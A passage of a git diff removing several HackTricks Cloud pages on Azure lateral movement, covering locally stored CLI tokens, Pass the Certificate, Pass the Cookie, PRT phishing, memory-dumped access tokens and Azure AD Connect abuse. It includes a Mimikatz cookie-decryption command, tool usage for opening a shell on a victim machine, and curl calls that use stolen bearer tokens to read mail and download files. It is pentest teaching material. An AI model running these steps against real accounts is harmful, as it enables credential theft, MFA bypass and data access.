stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/) - -## References - -* [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md deleted file mode 100644 index 0b2239549..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md +++ /dev/null @@ -1,65 +0,0 @@ -# Az - Local Cloud Credentials - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Local Token Storage and Security Considerations - -### Azure CLI (Command-Line Interface) - -Tokens and sensitive data are stored locally by Azure CLI, raising security concerns: - -1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`. -2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details. -3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as: - * Executed commands with credentials embedded. - * URLs accessed using tokens, potentially revealing sensitive information. - -### Azure PowerShell - -Azure PowerShell also stores tokens and sensitive data, which can be accessed locally: - -1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext. -2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`. -3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access. - -## Automatic Tools to find them - -* [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) -* [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1) - -## Security Recommendations - -Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by: - -* Limiting access rights to these files. -* Regularly monitoring and auditing these directories for unauthorized access or unexpected changes. -* Employing encryption for sensitive files where possible. -* Educating users about the risks and best practices for handling such sensitive information. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md deleted file mode 100644 index 31e22a7a5..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md +++ /dev/null @@ -1,67 +0,0 @@ -# Az - Pass the Certificate - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Pass the Certificate (Azure) - -In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism. - -In super simplified terms: - -* The machine (client) initiating the connection **needs a certificate from Azure AD for a user**. -* Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD** -* Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**. - -In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack: - -* Username -* Tenant ID -* PRT -* Security context -* Derived Key - -It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:** - -{% code overflow="wrap" %} -```bash -RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE] -``` -{% endcode %} - -The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user. - -```bash -Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP -``` - -## References - -* For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md deleted file mode 100644 index cdead6bd4..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md +++ /dev/null @@ -1,59 +0,0 @@ -# Az - Pass the Cookie - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Why Cookies? - -Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate. - -You can see where are **browser cookies located** in: - -{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome" %} - -## Attack - -The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in: - -{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords" %} - -With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command: - -```bash -mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit -``` - -For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately. - -Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated. - -## References - -* [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md deleted file mode 100644 index 301eb11d2..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Phishing Primary Refresh Token (Microsoft Entra) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md deleted file mode 100644 index 1520fc868..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Primary Refresh Token (PRT) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md deleted file mode 100644 index 3512fd876..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md +++ /dev/null @@ -1,65 +0,0 @@ -# Az - Processes Memory Access Token - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## **Basic Information** - -As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. - -Steps: - -1. Dump the excel processes synchronized with in EntraID user with your favourite tool. -2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output -3. Find the tokens that interest you the most and run tools over them: - -{% code overflow="wrap" %} -```bash -# Check the identity of the token -curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq - -# Check the email (you need a token authorized in login.microsoftonline.com) -curl -s -H "Authorization: Bearer " https://outlook.office.com/api/v2.0/me/messages | jq - -# Download a file from Teams -## You need a token that can access graph.microsoft.com -## Then, find the inside the memory and call -curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/sites//drives | jq - -## Then, list one drive -curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sites//drives/' | jq - -## Finally, download a file from that drive: -┌──(magichk㉿black-pearl)-[~] -└─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>' -``` -{% endcode %} - -**Note that these kind of access tokens can be also found inside other processes.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md deleted file mode 100644 index 109104b7e..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md +++ /dev/null @@ -1,86 +0,0 @@ -# Az AD Connect - Hybrid Identity - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments: - -* **Pass-Through Authentication (PTA)**: - * Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud). - * Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem). - -{% content-ref url="pta-pass-through-authentication.md" %} -[pta-pass-through-authentication.md](pta-pass-through-authentication.md) -{% endcontent-ref %} - -* **Password Hash Sync (PHS)**: - * Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user. - -{% content-ref url="phs-password-hash-sync.md" %} -[phs-password-hash-sync.md](phs-password-hash-sync.md) -{% endcontent-ref %} - -* **Federation**: - * Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities. - -{% content-ref url="federation.md" %} -[federation.md](federation.md) -{% endcontent-ref %} - -* **Seamless SSO:** - * Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user. - -{% content-ref url="seamless-sso.md" %} -[seamless-sso.md](seamless-sso.md) -{% endcontent-ref %} - -* **Cloud Kerberos Trust**: - * Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD. - -{% content-ref url="az-cloud-kerberos-trust.md" %} -[az-cloud-kerberos-trust.md](az-cloud-kerberos-trust.md) -{% endcontent-ref %} - -* **Default Applications**: - * Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files. - -{% content-ref url="az-default-applications.md" %} -[az-default-applications.md](az-default-applications.md) -{% endcontent-ref %} - -For each integration method, user synchronization is conducted, and an `MSOL_` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain. - -To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used: - -```powershell -Get-ADSyncConnector -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md deleted file mode 100644 index 357b0f863..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md +++ /dev/null @@ -1,35 +0,0 @@ -# Az - Default Applications - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8) - -The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md deleted file mode 100644 index d2c2f4287..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md +++ /dev/null @@ -1,61 +0,0 @@ -# Az- Synchronising New Users - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD - -I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements: - -* The **AzureAD user** needs to have a proxy address (a **mailbox**) -* License is not required -* Should **not be already synced** - -{% code overflow="wrap" %} -```powershell -Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl -``` -{% endcode %} - -When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email. - -An automatically, this user will be **synced from AzureAD to the on-prem AD user**. - -{% hint style="danger" %} -Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**. - -Also, this **won't bypass MFA**. - -Moreover, this was reported an **account sync is no longer possible for admin accounts**. -{% endhint %} - -## References - -* [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
